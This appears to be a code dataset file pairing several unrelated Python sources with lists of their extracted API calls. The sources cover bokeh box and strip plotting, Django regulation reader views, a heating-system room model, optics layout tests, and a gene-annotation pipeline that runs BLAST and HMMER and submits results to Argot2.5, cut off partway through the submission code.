horizontal=horizontal,
val=val,
**kwargs,
)
p = strip(
data=data,
q=q,
cats=cats,
q_axis=q_axis,
palette=palette,
order=order,
p=p,
show_legend=show_legend,
color_column=color_column,
parcoord_column=parcoord_column,
tooltips=tooltips,
marker=marker,
jitter=jitter,
marker_kwargs=marker_kwargs,
jitter_kwargs=jitter_kwargs,
parcoord_kwargs=parcoord_kwargs,
horizontal=horizontal,
val=val,
)
else:
raise RuntimeError("Invalid `top_level`. Allowed values are 'box' and 'strip'.")
return p
def _get_cat_range(df, grouped, order, color_column, q_axis):
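    # Determine the categorical factor range for the axis and the factors used for color mapping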
if order is None:
if isinstance(list(grouped.groups.keys())[0], tuple):
factors = tuple(
[tuple([str(k) for k in key]) for key in grouped.groups.keys()]
)
else:
factors = tuple([str(key) for key in grouped.groups.keys()])
else:
if type(order[0]) in [list, tuple]:
factors = tuple([tuple([str(k) for k in key]) for key in order])
else:
factors = tuple([str(entry) for entry in order])
if q_axis == "x":
cat_range = bokeh.models.FactorRange(*(factors[::-1]))
elif q_axis == "y":
cat_range = bokeh.models.FactorRange(*factors)
if color_column is None:
color_factors = factors
else:
color_factors = tuple(sorted(list(df[color_column].unique().astype(str))))
return cat_range, factors, color_factors
def _cat_figure(df, grouped, q, order, color_column, q_axis, kwargs):
cat_range, factors, color_factors = _get_cat_range(
df, grouped, order, color_column, q_axis
)
kwargs = utils._fig_dimensions(kwargs)
if q_axis == "x":
if "x_axis_label" not in kwargs:
kwargs["x_axis_label"] = q
if "y_axis_type" in kwargs:
warnings.warn("`y_axis_type` specified for categorical axis. Ignoring.")
del kwargs["y_axis_type"]
kwargs["y_range"] = cat_range
elif q_axis == "y":
if "y_axis_label" not in kwargs:
kwargs["y_axis_label"] = q
if "x_axis_type" in kwargs:
warnings.warn("`x_axis_type` specified for categorical axis. Ignoring.")
del kwargs["x_axis_type"]
kwargs["x_range"] = cat_range
return bokeh.plotting.figure(**kwargs), factors, color_factors
def _cat_source(df, cats, cols, color_column):
cat_source, labels = utils._source_and_labels_from_cats(df, cats)
if type(cols) in [list, tuple, pd.core.indexes.base.Index]:
source_dict = {col: list(df[col].values) for col in cols}
else:
source_dict = {cols: list(df[cols].values)}
source_dict["cat"] = cat_source
if color_column in [None, "cat"]:
source_dict["__label"] = labels
else:
source_dict["__label"] = list(df[color_column].astype(str).values)
source_dict[color_column] = list(df[color_column].astype(str).values)
return bokeh.models.ColumnDataSource(source_dict)
def _parcoord_source(data, q, cats, q_axis, parcoord_column, factors):
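    # Build line paths connecting points that share a value in parcoord_column, ordered by categorical factor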
if type(cats) not in [list, tuple]:
cats = [cats]
tuple_factors = False
else:
tuple_factors = True
grouped_parcoord = data.groupby(parcoord_column)
xs = []
ys = []
for t, g in grouped_parcoord:
xy = []
for _, r in g.iterrows():
if tuple_factors:
xy.append([tuple([r[cat] for cat in cats]), r[q]])
else:
xy.append([r[cats[0]], r[q]])
if len(xy) > 1:
xy.sort(key=lambda a: factors.index(a[0]))
xs_pc = []
ys_pc = []
for pair in xy:
xs_pc.append(pair[0])
ys_pc.append(pair[1])
if q_axis == "y":
xs.append(xs_pc)
ys.append(ys_pc)
else:
xs.append(ys_pc)
ys.append(xs_pc)
return bokeh.models.ColumnDataSource(dict(xs=xs, ys=ys))
def _outliers(data, min_data):
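    # Tukey fences: points beyond 1.5 * IQR from the quartiles are outliers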
if len(data) >= min_data:
bottom, middle, top = np.percentile(data, [25, 50, 75])
iqr = top - bottom
outliers = data[(data > top + 1.5 * iqr) | (data < bottom - 1.5 * iqr)]
return outliers
else:
return data
def _box_and_whisker(data, min_data):
if len(data) >= min_data:
middle = data.median()
bottom = data.quantile(0.25)
top = data.quantile(0.75)
iqr = top - bottom
top_whisker = max(data[data <= top + 1.5 * iqr].max(), top)
bottom_whisker = min(data[data >= bottom - 1.5 * iqr].min(), bottom)
return pd.Series(
{
"middle": middle,
"bottom": bottom,
"top": top,
"top_whisker": top_whisker,
"bottom_whisker": bottom_whisker,
}
)
else:
return pd.Series(
{
"middle": np.nan,
"bottom": np.nan,
"top": np.nan,
"top_whisker": np.nan,
"bottom_whisker": np.nan,
}
)
def _box_source(df, cats, q, cols, min_data):
"""Construct a data frame for making box plot."""
# Need to reset index for use in slicing outliers
df_source = df.reset_index(drop=True)
if cats is None:
grouped = df_source
else:
grouped = df_source.groupby(cats, sort=False)
# Data frame for boxes and whiskers
df_box = grouped[q].apply(_box_and_whisker, min_data).unstack().reset_index()
df_box = df_box.dropna()
source_box = _cat_source(
df_box, cats, ["middle", "bottom", "top", "top_whisker", "bottom_whisker"], None
)
# Data frame for outliers
s_outliers = grouped[q].apply(_outliers, min_data)
# If no cat has enough data, just use everything as an "outlier"
if len(s_outliers) == len(df_source):
df_outliers = df_source.copy()
inds = df_source.index
else:
df_outliers = s_outliers.reset_index()
inds = s_outliers.index.get_level_values(-1)
df_outliers.index = inds
df_outliers[cols] = df_source.loc[inds, cols]
source_outliers = _cat_source(df_outliers, cats, cols, None)
return source_box, source_outliers
|
[
"numpy.percentile",
"warnings.warn",
"copy.copy",
"pandas.Series"
] |
[((3977, 4001), 'copy.copy', 'copy.copy', (['jitter_kwargs'], {}), '(jitter_kwargs)\n', (3986, 4001), False, 'import copy\n'), ((4022, 4046), 'copy.copy', 'copy.copy', (['marker_kwargs'], {}), '(marker_kwargs)\n', (4031, 4046), False, 'import copy\n'), ((12267, 12288), 'copy.copy', 'copy.copy', (['box_kwargs'], {}), '(box_kwargs)\n', (12276, 12288), False, 'import copy\n'), ((12309, 12333), 'copy.copy', 'copy.copy', (['median_kwargs'], {}), '(median_kwargs)\n', (12318, 12333), False, 'import copy\n'), ((12355, 12380), 'copy.copy', 'copy.copy', (['whisker_kwargs'], {}), '(whisker_kwargs)\n', (12364, 12380), False, 'import copy\n'), ((12402, 12427), 'copy.copy', 'copy.copy', (['outlier_kwargs'], {}), '(outlier_kwargs)\n', (12411, 12427), False, 'import copy\n'), ((23815, 23836), 'copy.copy', 'copy.copy', (['box_kwargs'], {}), '(box_kwargs)\n', (23824, 23836), False, 'import copy\n'), ((23857, 23881), 'copy.copy', 'copy.copy', (['median_kwargs'], {}), '(median_kwargs)\n', (23866, 23881), False, 'import copy\n'), ((23903, 23928), 'copy.copy', 'copy.copy', (['whisker_kwargs'], {}), '(whisker_kwargs)\n', (23912, 23928), False, 'import copy\n'), ((23949, 23973), 'copy.copy', 'copy.copy', (['jitter_kwargs'], {}), '(jitter_kwargs)\n', (23958, 23973), False, 'import copy\n'), ((23994, 24018), 'copy.copy', 'copy.copy', (['marker_kwargs'], {}), '(marker_kwargs)\n', (24003, 24018), False, 'import copy\n'), ((24041, 24067), 'copy.copy', 'copy.copy', (['parcoord_kwargs'], {}), '(parcoord_kwargs)\n', (24050, 24067), False, 'import copy\n'), ((12542, 12687), 'warnings.warn', 'warnings.warn', (['f"""`display_outliers` is deprecated. Use `display_points`. Using `display_points={display_outliers}."""', 'DeprecationWarning'], {}), "(\n f'`display_outliers` is deprecated. Use `display_points`. Using `display_points={display_outliers}.'\n , DeprecationWarning)\n", (12555, 12687), False, 'import warnings\n'), ((30635, 30668), 'numpy.percentile', 'np.percentile', (['data', '[25, 50, 75]'], {}), '(data, [25, 50, 75])\n', (30648, 30668), True, 'import numpy as np\n'), ((31189, 31314), 'pandas.Series', 'pd.Series', (["{'middle': middle, 'bottom': bottom, 'top': top, 'top_whisker': top_whisker,\n 'bottom_whisker': bottom_whisker}"], {}), "({'middle': middle, 'bottom': bottom, 'top': top, 'top_whisker':\n top_whisker, 'bottom_whisker': bottom_whisker})\n", (31198, 31314), True, 'import pandas as pd\n'), ((31453, 31568), 'pandas.Series', 'pd.Series', (["{'middle': np.nan, 'bottom': np.nan, 'top': np.nan, 'top_whisker': np.nan,\n 'bottom_whisker': np.nan}"], {}), "({'middle': np.nan, 'bottom': np.nan, 'top': np.nan, 'top_whisker':\n np.nan, 'bottom_whisker': np.nan})\n", (31462, 31568), True, 'import pandas as pd\n'), ((14160, 14235), 'warnings.warn', 'warnings.warn', (['"""\'height\' entry in `box_kwargs` ignored; using `box_width`."""'], {}), '("\'height\' entry in `box_kwargs` ignored; using `box_width`.")\n', (14173, 14235), False, 'import warnings\n'), ((14329, 14403), 'warnings.warn', 'warnings.warn', (['"""\'width\' entry in `box_kwargs` ignored; using `box_width`."""'], {}), '("\'width\' entry in `box_kwargs` ignored; using `box_width`.")\n', (14342, 14403), False, 'import warnings\n'), ((28376, 28448), 'warnings.warn', 'warnings.warn', (['"""`y_axis_type` specified for categorical axis. Ignoring."""'], {}), "('`y_axis_type` specified for categorical axis. Ignoring.')\n", (28389, 28448), False, 'import warnings\n'), ((28679, 28751), 'warnings.warn', 'warnings.warn', (['"""`x_axis_type` specified for categorical axis. Ignoring."""'], {}), "('`x_axis_type` specified for categorical axis. Ignoring.')\n", (28692, 28751), False, 'import warnings\n')]
|
from django.views.generic.base import (
TemplateView,
View,
)
from django.http import Http404
from django.urls import reverse
from django.http import HttpResponseRedirect
from regulations.generator import api_reader
from regulations.views.mixins import CitationContextMixin
from regulations.views.utils import find_subpart
from regulations.views.errors import NotInSubpart
class ReaderView(CitationContextMixin, TemplateView):
template_name = 'regulations/reader.html'
sectional_links = True
client = api_reader.ApiReader()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
reg_version = context["version"]
reg_part = context["part"]
reg_title = context["title"]
tree = self.client.part(reg_version, reg_title, reg_part)
versions = self.get_versions(reg_title, reg_part)
parts = self.client.effective_title_parts(reg_version, reg_title)
document = tree['document']
toc = tree['toc']
part_label = toc['label_description']
c = {
'tree': self.get_content(context, document, toc),
'title': reg_title,
'reg_part': reg_part,
'part_label': part_label,
'toc': toc,
'parts': parts,
'versions': versions,
}
return {**context, **c}
def get_versions(self, title, part):
versions = self.client.regversions(title, part)
if versions is None:
raise Http404
return versions
def get_content(self, context, document, toc):
raise NotImplementedError()
class PartReaderView(ReaderView):
def get_content(self, context, document, structure):
return document
class SubpartReaderView(ReaderView):
def get_content(self, context, document, toc):
        # Use the table of contents to find the requested subpart, then extract that node from the document
subpart = context['subpart']
subpart_index = -1
for i in range(len(toc['children'])):
child = toc['children'][i]
if 'type' in child and 'identifier' in child:
if child['type'] == 'subpart' and child['identifier'][0] == subpart:
subpart_index = i
if subpart_index == -1:
raise Http404
return document['children'][subpart_index]
class SectionReaderView(View):
def get(self, request, *args, **kwargs):
url_kwargs = {
"title": kwargs.get("title"),
"part": kwargs.get("part"),
"version": kwargs.get("version"),
}
client = api_reader.ApiReader()
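        # If no version was given in the URL, fall back to the first version returned by the API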
if url_kwargs['version'] is None:
versions = client.regversions(kwargs.get("title"), url_kwargs['part'])
if versions is None:
raise Http404
url_kwargs['version'] = versions[0]['date']
try:
toc = client.toc(url_kwargs['version'], kwargs.get("title"), url_kwargs['part'])['toc']
subpart = find_subpart(kwargs.get("section"), toc)
if subpart is not None:
url_kwargs["subpart"] = subpart
except NotInSubpart:
pass
url = reverse("reader_view", kwargs=url_kwargs)
return HttpResponseRedirect(url)
|
[
"django.urls.reverse",
"django.http.HttpResponseRedirect",
"regulations.generator.api_reader.ApiReader"
] |
[((527, 549), 'regulations.generator.api_reader.ApiReader', 'api_reader.ApiReader', ([], {}), '()\n', (547, 549), False, 'from regulations.generator import api_reader\n'), ((2669, 2691), 'regulations.generator.api_reader.ApiReader', 'api_reader.ApiReader', ([], {}), '()\n', (2689, 2691), False, 'from regulations.generator import api_reader\n'), ((3260, 3301), 'django.urls.reverse', 'reverse', (['"""reader_view"""'], {'kwargs': 'url_kwargs'}), "('reader_view', kwargs=url_kwargs)\n", (3267, 3301), False, 'from django.urls import reverse\n'), ((3317, 3342), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (['url'], {}), '(url)\n', (3337, 3342), False, 'from django.http import HttpResponseRedirect\n')]
|
# Helper for testing.
#
# <NAME> [http://eli.thegreenplace.net]
# This code is in the public domain.
import sys
import time
def main():
count = 1
while True:
sys.stdout.write(f'{count} ')
if count % 20 == 0:
sys.stdout.write('\n')
time.sleep(0.05)
count += 1
if __name__ == '__main__':
main()
|
[
"sys.stdout.write",
"time.sleep"
] |
[((176, 205), 'sys.stdout.write', 'sys.stdout.write', (['f"""{count} """'], {}), "(f'{count} ')\n", (192, 205), False, 'import sys\n'), ((277, 293), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (287, 293), False, 'import time\n'), ((246, 268), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (262, 268), False, 'import sys\n')]
|
"""Groups everything related to a room."""
from datetime import datetime
from typing import List, Optional
import attr
from . import ActiveMode, Component, Function, OperatingModes, constants
@attr.s
class Device:
"""This is a physical device inside a :class:`Room`. It can be a VR50
VR51 or VR52.
Args:
name (str): Name of the device, this is set by the mobile app.
        sgtin (str): This is the serial number of the device.
device_type (str): Device type (VR51 = 'VALVE').
battery_low (bool): Indicate if the device is running low battery.
radio_out_of_reach (bool): Indicate if the device is connected to the
system.
"""
name = attr.ib(type=str)
sgtin = attr.ib(type=str)
device_type = attr.ib(type=str)
battery_low = attr.ib(type=bool)
radio_out_of_reach = attr.ib(type=bool)
@attr.s
class Room(Function, Component):
"""This is representing a room from the system.
Note:
The boost function - *the boost function is activated by pressing the
temperature selector. This means that the heating valves on the
assigned radiator thermostats are immediately opened 80% for 5
minutes* - is not reflected into the API.
Args:
humidity (float): In case of a VR51 is inside the room, you can get
humidity through the API.
child_lock (bool): Indicate if the device is locked, meaning you cannot
use the buttons on the device.
window_open (bool): Indicate if a window is open in the room. Of
course, this is data interpretation from vaillant API.
devices (List[Device]): List of :class:`Device` inside the room.
"""
MODES = [
OperatingModes.OFF,
OperatingModes.MANUAL,
OperatingModes.AUTO,
OperatingModes.QUICK_VETO,
]
"""List of mode that are applicable to rooms component."""
MIN_TARGET_TEMP = constants.FROST_PROTECTION_TEMP
"""Min `target temperature` that can be apply to a room."""
MAX_TARGET_TEMP = constants.THERMOSTAT_MAX_TEMP
"""Max `target temperature` that can be apply to a room."""
target_low = attr.ib(default=None, init=False)
humidity = attr.ib(type=Optional[float], default=None)
child_lock = attr.ib(type=bool, default=None)
window_open = attr.ib(type=bool, default=None)
devices = attr.ib(type=List[Device], default=None)
@property
def active_mode(self) -> ActiveMode:
"""ActiveMode: Get the :class:`~pymultimatic.model.mode.ActiveMode`
for this function. All operating modes are handled,
**but not quick veto nor quick mode.**
"""
if self.quick_veto:
mode = ActiveMode(self.quick_veto.target, OperatingModes.QUICK_VETO)
elif self.operating_mode == OperatingModes.AUTO:
setting = self.time_program.get_for(datetime.now())
mode = ActiveMode(setting.target_temperature, OperatingModes.AUTO, setting.setting)
elif self.operating_mode == OperatingModes.OFF:
mode = ActiveMode(self.MIN_TARGET_TEMP, OperatingModes.OFF)
else: # MODE_MANUAL
mode = ActiveMode(self.target_high, OperatingModes.MANUAL)
return mode
def _active_mode(self) -> ActiveMode:
pass
|
[
"attr.ib",
"datetime.datetime.now"
] |
[((703, 720), 'attr.ib', 'attr.ib', ([], {'type': 'str'}), '(type=str)\n', (710, 720), False, 'import attr\n'), ((733, 750), 'attr.ib', 'attr.ib', ([], {'type': 'str'}), '(type=str)\n', (740, 750), False, 'import attr\n'), ((769, 786), 'attr.ib', 'attr.ib', ([], {'type': 'str'}), '(type=str)\n', (776, 786), False, 'import attr\n'), ((805, 823), 'attr.ib', 'attr.ib', ([], {'type': 'bool'}), '(type=bool)\n', (812, 823), False, 'import attr\n'), ((849, 867), 'attr.ib', 'attr.ib', ([], {'type': 'bool'}), '(type=bool)\n', (856, 867), False, 'import attr\n'), ((2175, 2208), 'attr.ib', 'attr.ib', ([], {'default': 'None', 'init': '(False)'}), '(default=None, init=False)\n', (2182, 2208), False, 'import attr\n'), ((2224, 2267), 'attr.ib', 'attr.ib', ([], {'type': 'Optional[float]', 'default': 'None'}), '(type=Optional[float], default=None)\n', (2231, 2267), False, 'import attr\n'), ((2285, 2317), 'attr.ib', 'attr.ib', ([], {'type': 'bool', 'default': 'None'}), '(type=bool, default=None)\n', (2292, 2317), False, 'import attr\n'), ((2336, 2368), 'attr.ib', 'attr.ib', ([], {'type': 'bool', 'default': 'None'}), '(type=bool, default=None)\n', (2343, 2368), False, 'import attr\n'), ((2383, 2423), 'attr.ib', 'attr.ib', ([], {'type': 'List[Device]', 'default': 'None'}), '(type=List[Device], default=None)\n', (2390, 2423), False, 'import attr\n'), ((2890, 2904), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (2902, 2904), False, 'from datetime import datetime\n')]
|
# -*- coding: utf-8 -*-
"""
"""
from __future__ import division, print_function, unicode_literals
import pytest
from phasor.utilities.mpl.autoniceplot import (
#AutoPlotSaver,
#mplfigB,
asavefig,
)
import os.path as path
from phasor import alm
asavefig.org_subfolder = path.join(path.dirname(__file__), 'tests')
from IPython.lib.pretty import pprint as print
def test_layout(plot):
sys = alm.RootSystem(
env_principle_target = 'q1',
)
sys.own.q1 = alm.BeamTarget(
loc_m = 0,
q_raw = alm.ComplexBeamParam.from_Z_ZR(0, .04),
)
sys.own.lens1 = alm.ThinLens(
f_m = .1,
loc_in = 7,
)
sys.own.q2 = alm.BeamTarget(
loc_m = .4,
q_raw = alm.ComplexBeamParam.from_Z_ZR(0, .04),
)
sys.components
print(sys.measurements.target_idx('q1'))
if plot:
sys.plot('test_layout')
return sys
def test_regenerate(plot):
sys = test_layout(plot = False)
sys2 = sys.regenerate()
print(sys2.q1.loc_m.val)
print(sys2.q2.loc_m.val)
print(sys2.lens1.loc_m.val)
sys.component_pos_pairings
sys2.component_pos_pairings
assert(set(sys._registry_inserted.keys()) == set(sys2._registry_inserted.keys()))
assert(set(sys._registry_children.keys()) == set(sys2._registry_children.keys()))
#TODO make the plot optional
if plot:
sys.plot('test_regen')
print(sys2._registry_children)
print(sys2._registry_inserted)
return
def test_regenerate_auto(plot):
sys = test_layout(plot = False)
print("SYS INS: ", sys._registry_inserted)
sys2 = sys.regenerate()
print("SYS INS2: ", sys2._registry_inserted_pre)
sys.component_pos_pairings
sys2.component_pos_pairings
assert(set(sys._registry_inserted.keys()) == set(sys2._registry_inserted.keys()))
assert(set(sys._registry_children.keys()) == set(sys2._registry_children.keys()))
if plot:
sys.plot('test_regen_auto')
print(sys2._registry_children)
print(sys2._registry_inserted)
return
def test_regenerate_auto_ooa(plot):
sys = test_layout(plot = False)
sys2 = sys.regenerate()
sys.component_pos_pairings
sys2.component_pos_pairings
assert(set(sys._registry_inserted.keys()) == set(sys2._registry_inserted.keys()))
assert(set(sys._registry_children.keys()) == set(sys2._registry_children.keys()))
print('OOA1')
print(sys.ctree)
print('OOA2')
print(sys2.ctree)
sys2.print_yaml()
return
if __name__=='__main__':
#print("LAYOUT")
#test_layout(True)
#print("REGEN")
#test_regenerate(True)
print("REGEN_AUTO")
test_regenerate_auto_ooa(True)
|
[
"os.path.dirname",
"phasor.alm.ThinLens",
"IPython.lib.pretty.pprint",
"phasor.alm.RootSystem",
"phasor.alm.ComplexBeamParam.from_Z_ZR"
] |
[((294, 316), 'os.path.dirname', 'path.dirname', (['__file__'], {}), '(__file__)\n', (306, 316), True, 'import os.path as path\n'), ((410, 451), 'phasor.alm.RootSystem', 'alm.RootSystem', ([], {'env_principle_target': '"""q1"""'}), "(env_principle_target='q1')\n", (424, 451), False, 'from phasor import alm\n'), ((604, 635), 'phasor.alm.ThinLens', 'alm.ThinLens', ([], {'f_m': '(0.1)', 'loc_in': '(7)'}), '(f_m=0.1, loc_in=7)\n', (616, 635), False, 'from phasor import alm\n'), ((1001, 1025), 'IPython.lib.pretty.pprint', 'print', (['sys2.q1.loc_m.val'], {}), '(sys2.q1.loc_m.val)\n', (1006, 1025), True, 'from IPython.lib.pretty import pprint as print\n'), ((1030, 1054), 'IPython.lib.pretty.pprint', 'print', (['sys2.q2.loc_m.val'], {}), '(sys2.q2.loc_m.val)\n', (1035, 1054), True, 'from IPython.lib.pretty import pprint as print\n'), ((1059, 1086), 'IPython.lib.pretty.pprint', 'print', (['sys2.lens1.loc_m.val'], {}), '(sys2.lens1.loc_m.val)\n', (1064, 1086), True, 'from IPython.lib.pretty import pprint as print\n'), ((1404, 1434), 'IPython.lib.pretty.pprint', 'print', (['sys2._registry_children'], {}), '(sys2._registry_children)\n', (1409, 1434), True, 'from IPython.lib.pretty import pprint as print\n'), ((1439, 1469), 'IPython.lib.pretty.pprint', 'print', (['sys2._registry_inserted'], {}), '(sys2._registry_inserted)\n', (1444, 1469), True, 'from IPython.lib.pretty import pprint as print\n'), ((1554, 1596), 'IPython.lib.pretty.pprint', 'print', (['"""SYS INS: """', 'sys._registry_inserted'], {}), "('SYS INS: ', sys._registry_inserted)\n", (1559, 1596), True, 'from IPython.lib.pretty import pprint as print\n'), ((1629, 1677), 'IPython.lib.pretty.pprint', 'print', (['"""SYS INS2: """', 'sys2._registry_inserted_pre'], {}), "('SYS INS2: ', sys2._registry_inserted_pre)\n", (1634, 1677), True, 'from IPython.lib.pretty import pprint as print\n'), ((1967, 1997), 'IPython.lib.pretty.pprint', 'print', (['sys2._registry_children'], {}), '(sys2._registry_children)\n', (1972, 1997), True, 'from IPython.lib.pretty import pprint as print\n'), ((2002, 2032), 'IPython.lib.pretty.pprint', 'print', (['sys2._registry_inserted'], {}), '(sys2._registry_inserted)\n', (2007, 2032), True, 'from IPython.lib.pretty import pprint as print\n'), ((2385, 2398), 'IPython.lib.pretty.pprint', 'print', (['"""OOA1"""'], {}), "('OOA1')\n", (2390, 2398), True, 'from IPython.lib.pretty import pprint as print\n'), ((2403, 2419), 'IPython.lib.pretty.pprint', 'print', (['sys.ctree'], {}), '(sys.ctree)\n', (2408, 2419), True, 'from IPython.lib.pretty import pprint as print\n'), ((2424, 2437), 'IPython.lib.pretty.pprint', 'print', (['"""OOA2"""'], {}), "('OOA2')\n", (2429, 2437), True, 'from IPython.lib.pretty import pprint as print\n'), ((2442, 2459), 'IPython.lib.pretty.pprint', 'print', (['sys2.ctree'], {}), '(sys2.ctree)\n', (2447, 2459), True, 'from IPython.lib.pretty import pprint as print\n'), ((2614, 2633), 'IPython.lib.pretty.pprint', 'print', (['"""REGEN_AUTO"""'], {}), "('REGEN_AUTO')\n", (2619, 2633), True, 'from IPython.lib.pretty import pprint as print\n'), ((538, 577), 'phasor.alm.ComplexBeamParam.from_Z_ZR', 'alm.ComplexBeamParam.from_Z_ZR', (['(0)', '(0.04)'], {}), '(0, 0.04)\n', (568, 577), False, 'from phasor import alm\n'), ((731, 770), 'phasor.alm.ComplexBeamParam.from_Z_ZR', 'alm.ComplexBeamParam.from_Z_ZR', (['(0)', '(0.04)'], {}), '(0, 0.04)\n', (761, 770), False, 'from phasor import alm\n')]
|
import logging, os, re, sys,shutil
from code.utils.basic_utils import check_output_and_run
from pprint import pprint
from joblib import Parallel, delayed
from lxml import etree, html
from glob import glob
import zipfile
import csv
import requests
from requests_toolbelt import MultipartEncoder
import time
from Bio import SeqIO
from natsort import natsorted
def xml2tsv(in_xml):
out_tsv = re.sub(r"xml$","tsv",in_xml)
if not os.path.exists(out_tsv):
logging.info("Converting %s into %s." % (in_xml,out_tsv))
xslt_root = etree.parse("config/bl_xml2argot.xsl")
transform = etree.XSLT(xslt_root)
bl_tree = etree.parse(in_xml)
result_txt = str(transform(bl_tree)).splitlines(True)
sel_lines = [ line if re.match(r"[0-9A-Za-z]",line) else "" for line in result_txt]
with open(out_tsv,"w") as outfile:
outfile.writelines(sel_lines)
outfile.close()
else:
logging.info("Not converting %s into %s. Output file exists" % (in_xml,out_tsv))
def concat_tsv(all_tmp_bl_files,argot_out):
with open(argot_out,"w+") as outfile:
for tmp_tsv in all_tmp_bl_files:
with open(tmp_tsv,"r") as infile:
outfile.write(infile.read())
infile.close()
def convert_blast(config):
workdir=config["input"]["gomap_dir"]+"/"
ncpus=int(config["input"]["cpus"])
tmp_bl_dir=workdir + config["data"]["mixed-method"]["preprocess"]["blast_out"]+"/temp"
argot_tsv_dir=workdir + config["data"]["mixed-method"]["argot2"]["preprocess"]["blast"]
all_tmp_bl_files = sorted(glob(tmp_bl_dir+"/*.xml"))
Parallel(n_jobs=ncpus)(delayed(xml2tsv)(tmp_bl_file) for tmp_bl_file in all_tmp_bl_files)
def compile_blast_tsv(config):
workdir=config["input"]["gomap_dir"]+"/"
num_seqs=int(config["input"]["num_seqs"])
tmp_bl_dir=workdir + config["data"]["mixed-method"]["preprocess"]["blast_out"]+"/temp"
fa_pattern=tmp_bl_dir+"/"+config["input"]["basename"]+"*.fa"
fa_files = natsorted(glob(fa_pattern))
chunks = []
counter_start=0
counter_curr=-1
chunk_seqs = 0
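    # Group the split FASTA files (and their matching .tsv outputs) into chunks of num_seqs sequences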
for fa_file in fa_files:
counter_curr = counter_curr+1
all_seqs = list(SeqIO.parse(fa_file, "fasta"))
num_fa_records = len(all_seqs)
chunk_seqs = chunk_seqs + num_fa_records
if chunk_seqs % num_seqs == 0:
tmp_xml = [re.sub(r'\.fa$','.tsv',x) for x in fa_files[counter_start:counter_curr+1]]
chunks.append(tmp_xml)
counter_start = counter_curr+1
elif counter_curr+1 == len(fa_files):
tmp_xml = [re.sub(r'\.fa$','.tsv',x) for x in fa_files[counter_start:]]
chunks.append(tmp_xml)
argot_tsv_dir=workdir + config["data"]["mixed-method"]["argot2"]["preprocess"]["blast"]+"/"
for i in range(len(chunks)):
tsv_out=argot_tsv_dir+config["input"]["basename"]+"."+str(i+1)+".tsv"
zipfile_loc=tsv_out+'.zip'
concat_tsv(chunks[i],tsv_out)
if os.path.isfile(zipfile_loc):
logging.info(zipfile_loc +" already exists. Please delete if you need this recreated")
else:
zf = zipfile.ZipFile(zipfile_loc, mode='w',compression=zipfile.ZIP_DEFLATED)
zf.write(tsv_out,os.path.basename(tsv_out))
def run_hmmer(config):
workdir = config["input"]["gomap_dir"] + "/"
fa_dir = workdir+config["input"]["split_path"]
fa_files = natsorted(glob(fa_dir+"/*fa"))
hmmer_bin = config["software"]["hmmer"]["path"]+"/hmmscan"
hmmerdb=config["data"]["mixed-method"]["preprocess"]["hmmerdb"]
cpu = str(config["input"]["cpus"])
tmp_file=workdir+"hmmscan.tmp"
num_seqs=int(config["input"]["num_seqs"])
chunks = []
counter_start=0
counter_curr=-1
chunk_seqs = 0
chunk_count=0
all_seqs = []
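    # Pool sequences from the split FASTA files and write a combined FASTA every num_seqs records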
for fa_file in fa_files:
counter_curr = counter_curr+1
seqs = list(SeqIO.parse(fa_file, "fasta"))
num_fa_records = len(seqs)
chunk_seqs = chunk_seqs + num_fa_records
all_seqs = all_seqs + seqs
if chunk_seqs % num_seqs == 0 or fa_file == fa_files[-1]:
chunk_count=chunk_count+1
out_fa=workdir+config["data"]["mixed-method"]["argot2"]["preprocess"]["hmmer"] + "/" + config["input"]["basename"]+"."+str(chunk_count)+".fa"
SeqIO.write(all_seqs, out_fa, "fasta")
all_seqs=[]
chunk_seqs=0
hmmer_dir=workdir+config["data"]["mixed-method"]["argot2"]["preprocess"]["hmmer"]
fa_files = glob(hmmer_dir+"/*fa")
for infile in fa_files:
outfile = re.sub("\.fa",".hmm.out",infile)
cmd = [hmmer_bin,"-o",tmp_file,"--tblout",outfile,"--cpu",cpu,hmmerdb,infile]
zipfile_loc = outfile+".zip"
check_output_and_run(zipfile_loc,cmd)
if os.path.exists(outfile):
zf = zipfile.ZipFile(zipfile_loc, 'w',zipfile.ZIP_DEFLATED)
zf.write(outfile,os.path.basename(outfile))
if os.path.isfile(tmp_file):
os.remove(tmp_file)
def submit_argot2(config):
workdir = config["input"]["gomap_dir"] + "/"
argot_config=config["data"]["mixed-method"]["argot2"]
argot2_blast_dir=workdir+argot_config["preprocess"]["blast"]+"/"
argot2_hmmer_dir=workdir+argot_config["preprocess"]["hmmer"]+"/"
fa_path=workdir + config["data"]["mixed-method"]["preprocess"]["fa_path"]+"/"
tsv_pattern=argot2_blast_dir+"*tsv"
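    # Each chunk basename has a matching blast .tsv.zip and hmmer .out.zip to submit together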
tsv_files = [ re.sub(".tsv","",os.path.basename(fa_file)) for fa_file in glob(tsv_pattern)]
for tsv_file in tsv_files:
blast_file=glob(argot2_blast_dir+tsv_file+"*tsv.zip")[0]
hmmer_file=glob(argot2_hmmer_dir+tsv_file+"*out.zip")[0]
payload=argot_config["payload"]
payload["email"] = config["input"]["email"]
payload["descr"] = tsv_file
payload['scient_name'] = config["input"]["species"]
payload["tax_id"] = config["input"]["taxon"]
payload["taxon_ID"] = config["input"]["taxon"]
files={
"blast_file":(blast_file,open(blast_file, 'rb'),'text/plain'),
"hmmer_file":(hmmer_file,open(hmmer_file, 'rb'),'text/plain')
}
headers = {
"Host": "www.medcomp.medicina.unipd.it",
"Origin": "www.medcomp.medicina.unipd.it",
'User-agent': 'Mozilla/5.0 (X11; Linux x86_64)',
'Referer': "http://www.medcomp.medicina.unipd.it/Argot2-5/form_batch.php",
"Accept-Encoding": "gzip, deflate",
"Cache-Control": "no-cache",
"Upgrade-Insecure-Requests": "1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.9",
"Pragma": "no-cache",
"Connection": "keep-alive"
}
argot_url=argot_config["batch_url"]
html_file=workdir+argot_config["preprocess"]["html"]+"/"+tsv_file+".insert.html"
if os.path.isfile(html_file):
logging.info("This file has been previously submitted")
logging.info("Remove "+html_file+ " to resubmit")
else:
logging.info("Submitting %s and %s to Argot2.5" % (os.path.basename(blast_file),os.path.basename(hmmer_file)))
print("Submitting %s and %s to Argot2.5" % (os.path.basename(blast_file),os.path.basename(hmmer_file)))
s = requests.session()
